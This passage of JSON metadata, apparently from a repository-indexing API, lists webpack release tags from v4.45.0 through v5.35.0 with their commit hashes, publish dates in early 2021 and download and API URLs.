05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_